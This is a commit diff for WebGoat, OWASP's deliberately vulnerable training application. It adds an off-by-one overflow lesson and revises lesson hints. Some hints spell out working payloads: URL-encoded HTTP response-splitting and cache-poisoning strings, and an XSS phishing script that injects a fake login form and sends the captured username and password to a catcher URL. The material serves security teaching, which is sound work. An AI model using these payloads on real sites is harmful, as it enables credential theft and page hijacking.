dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added Buffer Overflow lesson, added and updated solutions, fixed errors in lessons preventing them from being completed correctly

Browse Source 
git-svn-id: http://webgoat.googlecode.com/svn/trunk/webgoat@436 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
x71c4l@gmail.com 2011-08-12 03:00:27 +00:00
parent be8b4311e0
commit 4059bb5d33
110 changed files with 2590 additions and 1116 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

103
src/main/java/org/owasp/webgoat/lessons/BufferOverflow.java
View File

@ -1,103 +0,0 @@
package org.owasp.webgoat.lessons;
import java.util.ArrayList;
import java.util.List;
import org.apache.ecs.Element;
import org.apache.ecs.StringElement;
import org.owasp.webgoat.session.WebSession;
/***************************************************************************************************
*
*
* This file is part of WebGoat, an Open Web Application Security Project utility. For details,
* please see http://www.owasp.org/
*
* Copyright (c) 2002 - 2007 Bruce Mayhew
*
* This program is free software; you can redistribute it and/or modify it under the terms of the
* GNU General Public License as published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
* even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with this program; if
* not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
* 02111-1307, USA.
*
* Getting Source ==============
*
* Source for this application is maintained at code.google.com, a repository for free software
* projects.
*
* For details, please see http://code.google.com/p/webgoat/
*
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003
*/
public class BufferOverflow extends LessonAdapter
{
/**
* Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
// just to get the generic how to text.
return super.createContent(s);
}
/**
* Gets the category attribute of the ForgotPassword object
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.BUFFER_OVERFLOW;
}
/**
* Gets the hints attribute of the HelloScreen object
*
* @return The hints value
*/
public List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("Lesson Hint 1");
hints.add("Lesson Hint 2");
return hints;
}
private final static Integer DEFAULT_RANKING = new Integer(15);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the title attribute of the HelloScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Buffer Overflow");
}
public Element getCredits()
{
return new StringElement("This screen created by: Your name could go here");
}
}

6
src/main/java/org/owasp/webgoat/lessons/CSRF.java
View File

@ -92,7 +92,7 @@ public class CSRF extends LessonAdapter
String title = HtmlEncoder.encode(s.getParser().getRawParameter(TITLE, ""));
String message = s.getParser().getRawParameter(MESSAGE, "");
Connection connection = DatabaseUtilities.getConnection(s);
Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
String query = "INSERT INTO messages VALUES (?, ?, ?, ?, ? )";
@ -221,7 +221,7 @@ public class CSRF extends LessonAdapter
try
{
Connection connection = DatabaseUtilities.getConnection(s);
Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
// edit by Chuck Willis - Added logic to associate similar usernames
// The idea is that users chuck-1, chuck-2, etc will see each other's messages
@ -280,7 +280,7 @@ public class CSRF extends LessonAdapter
{
int messageNum = s.getParser().getIntParameter(NUMBER, 0);
Connection connection = DatabaseUtilities.getConnection(s);
Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ? and lesson_type = ?";
PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,

6
src/main/java/org/owasp/webgoat/lessons/Category.java
View File

@ -57,11 +57,11 @@ public class Category implements Comparable
public final static Category XSS = new Category("Cross-Site Scripting (XSS)", new Integer(900));
public final static Category DOS = new Category("Denial of Service", new Integer(1000));
public final static Category ERROR_HANDLING = new Category("Improper Error Handling", new Integer(1000));
public final static Category ERROR_HANDLING = new Category("Improper Error Handling", new Integer(1100));
public final static Category INJECTION = new Category("Injection Flaws", new Integer(1100));
public final static Category INJECTION = new Category("Injection Flaws", new Integer(1200));
public final static Category DOS = new Category("Denial of Service", new Integer(1200));
public final static Category INSECURE_COMMUNICATION = new Category("Insecure Communication", new Integer(1300));

4
src/main/java/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
View File

@ -338,7 +338,7 @@ public class ClientSideFiltering extends SequentialLessonAdapter
hints.add("Stage 1: Look in the last row of the hidden table.");
hints
.add("Stage 1: You can access the server directly <a href = \"/WebGoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
.add("Stage 1: You can access the server directly <a href = \"/webgoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
+ "to see what results are being returned");
hints.add("Stage 2: The server uses an XPath query agasinst an XML database.");
@ -346,7 +346,7 @@ public class ClientSideFiltering extends SequentialLessonAdapter
hints.add("Stage 2: The query currently returns all of the contents of the database.");
hints
.add("Stage 2: The query should only return the information of employees who are managed by Moe Stooge, who's userID is 102");
.add("Stage 2: The query should only return the information of employees who are managed by Moe Stooge, whose userID is 102");
hints.add("Stage 2: Try using a filter operator.");

4
src/main/java/org/owasp/webgoat/lessons/DOMInjection.java
View File

@ -74,7 +74,7 @@ public class DOMInjection extends LessonAdapter
s.getResponse().setHeader("Cache-Control", "no-cache");
PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
out.print("document.forms[0].SUBMIT.disabled = false;");
out.print("document.form.SUBMIT.disabled = false;");
out.flush();
out.close();
return;
@ -182,7 +182,7 @@ public class DOMInjection extends LessonAdapter
List<String> hints = new ArrayList<String>();
hints.add("This page is using XMLHTTP to comunicate with the server.");
hints.add("Try to find a way to inject the DOM to enable the Activate button.");
hints.add("Intercept the reply and replace the body with document.forms[0].SUBMIT.disabled = false;");
hints.add("Intercept the reply and replace the body with document.form.SUBMIT.disabled = false;");
return hints;
}

2
src/main/java/org/owasp/webgoat/lessons/DOMXSS.java
View File

@ -243,7 +243,7 @@ public class DOMXSS extends SequentialLessonAdapter
if (getLessonTracker(s).getStage() == 1)
{
instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/WebGoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/webgoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
}
else if (getLessonTracker(s).getStage() == 2)
{

4
src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java
View File

@ -228,11 +228,11 @@ public class HttpSplitting extends SequentialLessonAdapter
hints.add("The Content-Length: 0 will tell the server that the first request is over.");
hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK");
hints
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/> Try: language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/> Try: foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked!%3C%2Fhtml%3E <br/>For insight into what this does, use the PHP charset encoder to decode it.");
hints
.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date.");
hints
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202080%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked%20J%3C%2Fhtml%3E");
hints
.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page");
hints

2
src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java
View File

@ -361,7 +361,7 @@ public class MaliciousFileExecution extends LessonAdapter
String instructions = "The form below allows you to upload an image which will be displayed on this page. "
+ "Features like this are often found on web based discussion boards and social networking sites. "
+ "This feature is vulnerable to Malicious File Execution."
+ "<br><br>In order to pass this lession, upload and run a malicious file. In order to prove that your file can execute,"
+ "<br><br>In order to pass this lesson, upload and run a malicious file. In order to prove that your file can execute,"
+ " it should create another file named:<br><br> "
+ uploads_and_target_parent_directory
+ TARGET_RELATIVE_PATH

518
src/main/java/org/owasp/webgoat/lessons/OffByOne.java Normal file
View File

@ -0,0 +1,518 @@
package org.owasp.webgoat.lessons;
import java.util.ArrayList;
import java.util.List;
import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.IMG;
import org.apache.ecs.html.Input;
import org.apache.ecs.html.TD;
import org.apache.ecs.html.TR;
import org.apache.ecs.html.Table;
import org.apache.ecs.xhtml.br;
import org.owasp.webgoat.session.ECSFactory;
import org.owasp.webgoat.session.ParameterNotFoundException;
import org.owasp.webgoat.session.ValidationException;
import org.owasp.webgoat.session.WebSession;
/***************************************************************************************************
*
*
* This file is part of WebGoat, an Open Web Application Security Project utility. For details,
* please see http://www.owasp.org/
*
* Copyright (c) 2002 - 2007 Bruce Mayhew
*
* This program is free software; you can redistribute it and/or modify it under the terms of the
* GNU General Public License as published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
* even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with this program; if
* not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
* 02111-1307, USA.
*
* Getting Source ==============
*
* Source for this application is maintained at code.google.com, a repository for free software
* projects.
*
* For details, please see http://code.google.com/p/webgoat/
*
* @author Yiannis Pavlosoglou <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created December 05, 2009
*/
public class OffByOne extends LessonAdapter
{
private final static String[] price_plans = { "$1.99 - 1 hour ", "$5.99 - 12 hours", "$9.99 - 24 hours"};
private final static String ROOM_NUMBER = "room_no";
private final static String FIRST_NAME = "first_name";
private final static String LAST_NAME = "last_name";
private final static String PRICE_PLAN = "price_plan";
private final static IMG LOGO = new IMG("images/logos/seleucus.png").setAlt("Seleucus Ltd")
.setBorder(0).setHspace(0).setVspace(0);
/**
* <p>The main method for creating content, implemented
* from the the LessonAdapter class.</p>
*
* <p>This particular "Off-by-One" lesson belonging in
* the category of "Buffer Overflows" carries three
* steps.</p>
*
* @param s
* WebSession
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{
if(isFirstStep(s))
{
ec.addElement(makeFirstStep(s));
}
else
{
if (isSecondStep(s))
{
ec.addElement(makeSecondStep(s));
}
else
{
ec.addElement(makeThirdStep(s));
}
}
} catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
e.printStackTrace();
}
return (ec);
}
/**
* <p>Returns the Buffer Overflow category for this
* lesson.</p>
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.BUFFER_OVERFLOW;
}
/**
* <p>Returns the hints as a List of Strings
* for this lesson.</p>
*
* @return The hints values
*/
public List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("While registering for Internet usage, see where else your details are used during the registration process.");
hints.add("See which fields during the registration process, allow for really long input to be submitted.");
hints.add("Check for hidden form fields during registration");
hints.add("Typically, web-based buffer overflows occur just above the value of 2 to the power of a number. E.g. 1024 + 1, 2048 + 1, 4096 + 1");
return hints;
}
/**
* <p>Get the default ranking within the "Buffer
* Overflow" category.</p>
*
* <p>Currently ranked to be the first lesson in
* this category.</p>
*
* @return The value of 5 as an Integer Object
*/
protected Integer getDefaultRanking()
{
return new Integer(5);
}
/**
* <p>Gets the title attribute for this lesson.</p>
*
* @return "Off-by-One Overflows"
*/
public String getTitle()
{
return ("Off-by-One Overflows");
}
/**
* yada, yada...
*/
public Element getCredits()
{
return super.getCustomCredits("Created by Yiannis Pavlosoglou ", LOGO);
}
/**
* <p>Based on the parameters currently with values, this method
* returns true if we are in the first step of this lesson.</p>
*
* @param s
* @return true if we are in the first step of the lesson.
*/
protected boolean isFirstStep(WebSession s)
{
String room = s.getParser().getRawParameter(ROOM_NUMBER, "");
String name = s.getParser().getRawParameter(FIRST_NAME, "");
String last = s.getParser().getRawParameter(LAST_NAME, "");
return (room.isEmpty() && name.isEmpty() && last.isEmpty() );
}
/**
* <p>Based on the parameters currently with values, this method
* returns true if we are in the second step of this lesson.</p>
*
* @param s
* @return true if we are in the second step of the lesson
*/
protected boolean isSecondStep(WebSession s)
{
String price = s.getParser().getRawParameter(PRICE_PLAN, "");
return price.isEmpty();
}
/**
* <p>Method for constructing the first step and returning it as
* an Element.</p>
*
* @param s
* @return The Element that is the first step.
*/
private Element makeFirstStep(WebSession s)
{
ElementContainer ec = new ElementContainer();
String param = "";
// Header
ec.addElement(new StringElement("In order to access the Internet, you need to provide us the following information:"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Step 1/2"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Ensure that your first and last names are entered exactly as they appear in the hotel's registration system."));
ec.addElement(new br());
ec.addElement(new br());
// Table
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
// First Name
try {
param = s.getParser().getStrictAlphaParameter(FIRST_NAME, 25);
} catch (ParameterNotFoundException e) {
param = "";
} catch (ValidationException e) {
param = "";
}
Input input = new Input(Input.TEXT, FIRST_NAME, param);
TR tr = new TR();
tr.addElement(new TD().addElement("First Name: "));
tr.addElement(new TD().addElement(input));
tr.addElement(new TD().addElement("*"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Last Name
try {
param = s.getParser().getStrictAlphaParameter(LAST_NAME, 25);
} catch (ParameterNotFoundException e) {
param = "";
} catch (ValidationException e) {
param = "";
}
input = new Input(Input.TEXT, LAST_NAME, param);
tr = new TR();
tr.addElement(new TD().addElement("Last Name: "));
tr.addElement(new TD().addElement(input));
tr.addElement(new TD().addElement("*"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Room Number
try {
param = s.getParser().getStrictAlphaParameter(ROOM_NUMBER, 25);
} catch (ParameterNotFoundException e) {
param = "";
} catch (ValidationException e) {
param = "";
}
input = new Input(Input.TEXT, ROOM_NUMBER, param);
tr = new TR();
tr.addElement(new TD().addElement("Room Number: "));
tr.addElement(new TD().addElement(input));
tr.addElement(new TD().addElement("*"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Submit
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Submit")));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
ec.addElement(t);
// Footer
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("* The above fields are required for login."));
ec.addElement(new br());
ec.addElement(new br());
return ec;
}
/**
* <p>Method for constructing the second step and returning it as
* an Element.</p>
*
* @param s
* @return The Element that is the second step.
*/
private Element makeSecondStep(WebSession s)
{
ElementContainer ec = new ElementContainer();
String param = "";
// Header
ec.addElement(new StringElement("Please select from the following available price plans:"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Step 2/2"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Ensure that your selection matches the hours of usage, as no refunds are given for this service."));
ec.addElement(new br());
ec.addElement(new br());
// Table
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
// First Empty Row
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Price Plans
tr = new TR();
tr.addElement(new TD().addElement("Available Price Plans:"));
tr.addElement(new TD().addElement(ECSFactory.makePulldown(PRICE_PLAN, price_plans, price_plans[2], 1)));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Submit
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Accept Terms")));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
ec.addElement(t);
ec.addElement("\r\n");
// Hidden Form Fields
param = s.getParser().getStringParameter(LAST_NAME, "");
Input input = new Input(Input.HIDDEN, LAST_NAME, param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(FIRST_NAME, "");
input = new Input(Input.HIDDEN, FIRST_NAME, param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(ROOM_NUMBER, "");
input = new Input(Input.HIDDEN, ROOM_NUMBER, param);
ec.addElement(input);
ec.addElement("\r\n");
// Footer
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("By Clicking on the above you accept the terms and conditions."));
ec.addElement(new br());
ec.addElement(new br());
return ec;
}
/**
* <p>Method for constructing the third step and returning it as
* an Element.</p>
*
* @param s
* @return The Element that is the third step.
*/
private Element makeThirdStep(WebSession s)
{
ElementContainer ec = new ElementContainer();
String param = "";
// Header
ec.addElement(new StringElement("You have now completed the 2 step process and have access to the Internet"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Process complete"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Your connection will remain active for the time allocated for starting now."));
ec.addElement(new br());
ec.addElement(new br());
// Table
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
// First Empty Row
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Price Plans
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Submit
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
ec.addElement(t);
ec.addElement("\r\n");
// Hidden Form Fields
param = s.getParser().getStringParameter(LAST_NAME, "");
Input input = new Input(Input.HIDDEN, "a", param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(FIRST_NAME, "");
input = new Input(Input.HIDDEN, "b", param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(ROOM_NUMBER, "");
input = new Input(Input.HIDDEN, "c", param);
ec.addElement(input);
ec.addElement("\r\n");
// And finally the check...
if(param.length() > 4096)
{
ec.addElement(new Input(Input.hidden, "d", "Johnathan"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "e", "Ravern"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "f", "4321"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "g", "John"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "h", "Smith"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "i", "56"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "j", "Ana"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "k", "Arneta"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "l", "78"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "m", "Lewis"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "n", "Hamilton"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "o", "9901"));
ec.addElement("\r\n");
// :)
makeSuccess(s);
}
// Footer
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("We would like to thank you for your payment."));
ec.addElement(new br());
ec.addElement(new br());
return ec;
}
}

59
src/main/java/org/owasp/webgoat/lessons/Phishing.java
View File

@ -170,21 +170,21 @@ public class Phishing extends LessonAdapter
+ "Try to make the form look official.");
hints
.add("Try: <BR> "
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Add functionality that can post a request, a button might work<BR><BR>"
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+ "http://localhost/WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
+ "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints
.add("Try: <BR> "
+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot;&gt;"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
@ -192,49 +192,52 @@ public class Phishing extends LessonAdapter
.add("Make the button perform an action on submit, <BR>"
+ "adding an onclick=\"hack()\" might work<BR>"
+ "Don't forget to add the hack() javascript function"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;<BR>"
+ "Also, check firebug. Does the search form need to be terminated for this to work...? (&lt;/form&gt;)");
hints
.add("You need to create the hack() function. This function will pull the credentials from the "
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
+ "<BR> Some useful code snippets:<UL>"
+ "<LI>doucument.forms[0].user.value - will access the user field"
+ "<LI>doucument.phish.user.value - will access the user field"
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
+ "<BR><BR>Solution for this hint():<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms[0].user.value + &quot;\nPassword = &quot; + document.forms[0].pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}"
+ "<BR><BR>The entire javascript portion:<BR><BR>"
+ "&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;");
hints
.add("Complete solution for this lesson:<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms[0].user.value + &quot;\nPassword = &quot; + document.forms[0].pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}"
+ "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "&lt;/form&gt;&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials
* were just stolen.\nUser Name = " + document.forms[0].user.value + "\nPassword = " +
* document.forms[0].pass.value); XSSImage=new Image;
* were just stolen.\nUser Name = " + document.phish.user.value + "\nPassword = " +
* document.phish.pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="
* +document.forms[0].user.value + "&password=" + document.forms[0].pass.value +
* "";}</script><form><br>
* +document.phish.user.value + "&password=" + document.phish.pass.value +
* "";}</script><form name="phish"><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2> <br>
* <br>
* Enter Username:<br>
* <input type="text" id="user" name="user"><br>
* <input type="text" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
@ -258,7 +261,7 @@ public class Phishing extends LessonAdapter
